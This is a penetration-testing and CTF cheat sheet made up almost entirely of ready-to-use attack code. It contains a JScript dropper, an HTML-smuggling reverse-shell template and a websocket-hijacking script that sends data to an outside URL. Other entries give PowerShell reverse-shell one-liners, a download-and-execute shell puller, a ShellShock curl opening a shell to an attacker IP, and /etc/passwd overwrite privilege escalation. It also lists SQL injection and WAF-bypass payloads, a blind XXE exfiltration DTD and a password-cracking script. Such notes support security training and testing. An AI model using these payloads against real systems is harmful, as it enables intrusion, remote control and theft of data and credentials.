Notes
JScript (.js) Dropper
var url = "" !!! URL with the target file
var Object = WScript.CreateObject('MSXML2.XMLHTTP');
Object.Open('GET', url, false);
Object.Send();
if (Object.Status == 200)
{
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile("!!! INSERT HERE THE FILE NAME", 2);
Stream.Close();
}
var r = new ActiveXObject("WScript.Shell").Run("!!! INSERT HERE THE FILENAME");
HTML Smuggling (download automatically malicious file through JavaScript
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='' !!! BASE64 encoded payload (reverse shell)
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = ''; !!! The filename
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
Special XSS Payload (obfuscated)
<img src=1 oNeRrOr=alert`1`>
Cross-Site Websocket Hijacking
Works when websocket session is only identified by a static cookie or something unpredictable
Script (to store on external attacker side):
<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
Host Header Injection to Manipulate Forgot Password
Works in case when the password reset functionality delivers reset password tokens to the email inbox of your target account
Create Burp collaborator client/Request Bin client/Email client
Change the host header to that domain
Localhost (especially for SSRF) bypass blacklist
change from localhost/127.0.0.1 to 127.1
WAF Bypass
<img src=x onerror="window['al'+'ert'+'']('WAF Bypassed')"> </img>
x86 Msfvenom Encoders (good ones!)
x86/shikata_ga_nai
x86/fnstenv_mov
TMUX Hijacking
tmux -S *session path*
Example: tmux -S /.devs/dev_sess
Hidden Windows Text Stream
Find:
dir /R
Read:
more < hm.txt:root.txt:$DATA
DirtyCOW Exploit (Linux Kernel version from 2.6.22 to 3.9)
https://github.com/FireFart/dirtycow/blob/master/dirty.c
Oracle Enumeration TNS Listener (port 1521)
https://github.com/quentinhardy/odat
Also check HackTheBox Silo writeup for more references
Buffer Overflow Bad Chars
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
JS Meterpreter Payload
msfvenom -p <payload > LHOST=<ip> LPORT=<port> -f js_le -e generic/none
Compile on Linux for Windows x86
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
From MSSQL Injection to RCE
https://www.tarlogic.com/en/blog/red-team-tales-0x01/
Windows Kernel Vulnerabilities Finder - Sherlock (PowerShell)
https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1
PowerShell one-liners (incl. file transfers)
https://www.puckiestyle.nl/
Much Better PowerShell Reverse Shell One-Liner
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='IP';$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
Post-Exploitation Enumerate all users of Domain
net user /Domain
Windows XP SP0/SP1 Privilege Escalation:
https://sohvaxus.github.io/content/winxp-sp1-privesc.html
SUID Flag on /usr/bin/cp command Privilege Escalation
1. echo "bob:\$1\$-itnite\$VRvGqpGVibx/r9NPdLLTF1:0:0:root:/root:/bin/bash" >> /tmp/passwd
2. /usr/bin/cp /tmp/passwd /etc/passwd
3. su - bob (Password: bob)
Writable /etc/passwd Privilege Escalation
echo root::0:0:root:/root:/bin/bash > /etc/passwd
su
Bypass robots.txt "You are not a search engine. Permission denied."
Set User-Agent to "User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
ShellShock PHP < 5.6.2
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ATTACKER IP/PORT 0>&1' http://VICTOM/cgi-bin/admin.cgi
Privilege Escalation through SeImpersonatePrivilege permission (JuicyPotato)
https://github.com/ohpe/juicy-potato/releases https://www.absolomb.com/2018-05-04-HackTheBox-Tally/
Memcached Pentest & Enumeration
https://www.hackingarticles.in/penetration-testing-on-memcached-server/
Tunneling Post-Exploitation (PortForwarding) through Chisel
https://github.com/jpillora/chisel
Active Directory Users & Groups Enumeration
net user /domain
net group /domain
Tunelling on Windows
Using plink.exe within PuTTY project folder
Windows Architecture and Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Windows Service Start Mode
wmic service where caption="SERVICE" get startmode
Windows check permissions over a file/executable with 'icacls'
icacls "C\full_path\file.exe"
Permissions: F - full access M - modify access RX - read & execute access R - read access W - write-only access
Powershell Running Services
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Client-Side .hta (HTML-based Internet Explorer only) Code Execution
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Fingerprinting Client-Side Victim
https://github.com/fingerprintjs/fingerprintjs2
Scan Security Headers
PowerShell to retrieve Active Directory objects (including deleted)
Get-ADObject
Decode LDAP Passwords
https://dotnetfiddle.net/2RDoWz
mysql command line alternative
mysqldump
TTY Shell that works almost every time on Linux
/usr/bin/script -qc /bin/bash /dev/null
Kerberos check for valid usernames or bruteforce user/pass with kerbrute
kerbrute
https://github.com/TarlogicSecurity/kerbrute
Crawls web pages for keywords
cewl
TeamViewer Privilege Escalation -> CVE-2019-189888
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
PowerShell Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient('192.168.0.0',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$sm=(New-Object Net.Sockets.TCPClient('192.168.0.0',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Pull the shell:
powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('SHELL URL')"
Wget Alternative for Windows in PowerShell
$client = new-object System.Net.WebClient
$client.DownloadFile("URL","Local Download Path")
CVE-2019-10-15 Sudo < 1.2.28 Privilege Escalation
sudo -u#-1 /bin/bash
Adminer Database Management Tool Exploit Bypass Login
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Alternate data streams of empty or incomplete file on SMB
allinfo *file*
SMB Recursively List Files
recurse on
ls
Telnet > Netcat
When connecting to a service, where possible, choose TELNET over Netcat
/etc/update-motd.d Privilege Escalation
https://blog.haao.sh/writeups/fowsniff-writeup/
SSH into Victim without password
- From the attacker machine generate RSA keypair:
ssh-keygen -t rsa
- Copy the public key (id_rsa.pub) into the
.ssh/authorized_keys
file of the victim - SSH with the -i argument (id_rsa)
Really Good Privilege Escalation Scripts
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
XMPP Authentication Crack
import base64
import hashlib
import hmac
import itertools
charset = "_abcdefghijklmnopqrstuvwxyz"
initial_message = "n=,r="
server_first_message = "r=,s=,i="
server_final_message_compare = "v="
r = server_first_message[2:server_first_message.find('s=')-1]
s = server_first_message[server_first_message.find('s=')+2:server_first_message.find('i=')-1]
i = server_first_message[server_first_message.find('i=')+2:]
for passlen in range(1,3):
print "test passlen %d" % passlen
for k in itertools.permutations(charset, passlen):
password = "koma" + "".join(k)
salt = base64.b64decode(s)
client_final_message_bare = 'c=biws,r=' + r
salt_password = hashlib.pbkdf2_hmac('sha1', password, salt, int(i))
auth_message = initial_message + ',' + server_first_message + ',' + client_final_message_bare
server_key = hmac.new(salt_password, 'Server Key', hashlib.sha1).digest()
server_signature = hmac.new(server_key, auth_message, hashlib.sha1).digest()
server_final_message = 'v=' + base64.b64encode(server_signature)
if server_final_message == server_final_message_compare:
print "found the result"
print password
h = hashlib.new('sha1')
h.update(password)
print h.hexdigest()
exit(-1)
CTF Docs
https://github.com/welchbj/ctf/tree/master/docs
Test for LDAP NULL BIND
ldapsearch -H ldap://host:port -x -s base '' "(objectClass=*)" "*" +
Extract VBA Script from document
https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php
Decode Rubber Ducky USB .bin payloads
https://ducktoolkit.com/decode#
Crack Android lockscreen from system files (gesture.key)
https://github.com/KieronCraggs/GestureCrack
XOR Analysis
https://github.com/hellman/xortool
Cryptanalysis
https://github.com/nccgroup/featherduster
RSA Cracking Tools
https://github.com/Ganapati/RsaCtfTool
https://github.com/ius/rsatool
Morse Code Audio Decode
https://morsecode.world/international/decoder/audio-decoder-adaptive.html
Text to 21 Common Ciphers
https://v2.cryptii.com/text/select
Crypto Example Challs
https://asecuritysite.com/encryption/ctf?mybutton=
Shift in Python
with open('FILENAME') as f:
msg = f.read()
for x in range(256):
print ''.join([chr((ord(y) + x) % 256) for y in msg])
Predict encoding type
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')
Get data, process and respond over a socket
import socket
import re
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect(('IP', PORT))
data = clientsocket.recv(1024)
print data
result = re.sub('[^0-9]', '', data) #Retrieve the digits (or numbers) only from input
print result
clientsocket.send(str(result))
data = clientsocket.recv(1024)
print data
Extract domain names & hosts from PCAP
Domain Names
tshark -r *PCAP* -Y 'dns' -T fields -e dns.qry.name | sort -u > dns.txt
Hosts
tshark -r *PCAP* -Y 'tls.handshake.extensions_server_name' -T fields -e tls.handshake.extensions_server_name | sort -u > hosts.txt
Manual UNION SQLite Injection
Table
1' union all select 1,tbl_name,3 FROM sqlite_master WHERE type='table' limit 0,1 --
Columns (as command)
1' union all select 1,sql,3 FROM sqlite_master WHERE type='table' and tbl_name='nameoftable' limit 0,1 --
Values (payload depends on the columns structure)
1' union all select 1,"nameofcolumn",3 FROM "nameoftable" limit 2,1 --
SQL Injection Little Tips
--
-> Linux
--+
-> Windows
%23 (#)
-> Hash
%2527 (')
-> bypass urldecode(urldecode(htmlspecialchars(, ENT_QUOTES)));
Manual UNION SQL Injection
Table
1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Columns
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='nameoftable'),2#
Values
1' union select (select nameofcolumn from nameoftable limit 0,1),2#
Using Newline
admin %0A union %0A select %0A 1,database()#
or
admin %0A union %0A select %0A database(),2#
Bypass preg_replace
ununionion select 1,2%23
or
UNunionION SEselectLECT 1,2,3%23
Known Plaintext ZIP
Download pkcrack
https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html
! Before using, it must be built from source
Syntax
./pkcrack -C encrypted.zip -c file -P plaintext.zip -p file
Python Functions
Files: https://www.w3schools.com/python/python_ref_file.asp
Strings: https://www.w3schools.com/python/python_ref_string.asp
Keyworks: https://www.w3schools.com/python/python_ref_keywords.asp
Random: https://www.w3schools.com/python/module_random.asp
PHP Functions
Files: https://www.w3schools.com/php/php_ref_filesystem.asp
Directories: https://www.w3schools.com/php/php_ref_directory.asp
Errors: https://www.w3schools.com/php/php_ref_error.asp
Network: https://www.w3schools.com/php/php_ref_network.asp
Misc: https://www.w3schools.com/php/php_ref_misc.asp
PHP Jail Escape
With file_get_contents()
print file_get_contents('flag.txt');
With readfile()
echo readfile("flag.txt");
With popen()
popen("vi", "w");
:r flag.txt
or
:!/bin/bash
With highlight_file()
highlight_file(glob("flag.txt")[0]);
or
highlight_file(glob("fl*txt")[0]);
With highlight_source()
highlight_source("flag.txt");
or
highlight_source(glob("*")[4]);
With Finfo()
new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
XPATH Dump
https://example.com/accounts.php?user=test"]/../*%00&xpath_debug=1
LFI Retrieve File without executing it
https://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
Useful PCAP Reader
chaosreader
ZIP Format Signatures
HEADER
50 4B 03 04 14
FOOTER
50 4B 05 06 00
JWT KID Value Exploitation
Sign with public file from server
kid: public/css/file.css
wget file.css from target
manipulate token using jwt_tool and sign it with file.css
SQL Injection
kid: test' UNION SELECT 'key';--
manipulate token using jwt_tool and sign it using the secret -> 'key'
Blind XXE to SSRF
ON TARGET
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "*HOST ADDRESS OF DTD FILE (preferably on github)*">
<foo>&e1;</foo>
INSIDE DTD FILE
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM '*RANDOM HTTP HOST (like https://requestbin.com/)*/%p1;'>">
%p2;
Hidden terminal input history
find . -name .bash_history -exec grep -A 1 '^passwd' {} \;
Search file by name pattern
find -name "*PATTERN*" 2>/dev/null
Search string
grep -r "STRING" / 2>/dev/null
Check SUDO privileges/rights
sudo -l